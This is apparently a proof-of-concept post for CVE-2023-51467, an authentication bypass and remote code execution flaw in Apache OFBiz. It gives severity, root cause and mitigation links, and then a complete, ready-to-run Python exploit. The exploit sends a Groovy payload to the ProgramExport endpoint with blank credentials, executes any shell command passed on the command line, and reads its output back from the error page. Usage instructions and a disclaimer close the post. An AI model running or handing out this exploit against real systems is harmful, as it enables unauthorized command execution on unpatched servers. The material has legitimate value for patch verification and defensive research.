CVE-2023-51467: Apache OfBiz Auth Bypass and RCE

CVE-2023-51467.md

Apache OfBiz Auth Bypass and RCE - PoC

• CVE: CVE-2023-51467
• Severity: Critical (CVSS 9.8)
• Root cause: https://github.com/apache/ofbiz-framework/blob/0530a58d3a912520b7f9e46c5ccde98fd3737bf5/framework/webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ProgramExport.groovy#L90
• Mitigation: Upgrade Apache OFBiz
• Reference: https://issues.apache.org/jira/browse/OFBIZ-12873

File: script.py

import requests
from bs4 import BeautifulSoup
import sys

def send_post_request(url, command):
    target_url = f"{url}/webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y"
    post_data = {"groovyProgram": f'def result = "{command}".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField("win3zz"+result);'}

    response = requests.post(target_url, data=post_data)

    if response.status_code == 200:
        print("Request successfully sent.")
        
        # Parse the HTML content
        soup = BeautifulSoup(response.text, 'html.parser')
        
        # Find the div with id="content-messages" and class="content-messages errorMessage"
        error_div = soup.find('div', {'id': 'content-messages', 'class': 'content-messages errorMessage'})
        
        if error_div:
            # Extract and print the text content of the div and its descendants
            error_text = error_div.get_text(strip=True)
            print("Error Message:")
            print(error_text)
        else:
            print("No error message found.")
    else:
        print(f"Error: {response.status_code} - {response.text}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)

    url_arg = sys.argv[1]
    command_arg = sys.argv[2]

    send_post_request(url_arg, command_arg)

Make sure to install beautifulsoup4 library if you haven't already by running pip install beautifulsoup4.

To run the script, use the following command:

user@host:~/CVE-2023-51467$ python3 script.py <url> <command>

• https://twitter.com/win3zz/status/1741380792948072934

Disclaimer

This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.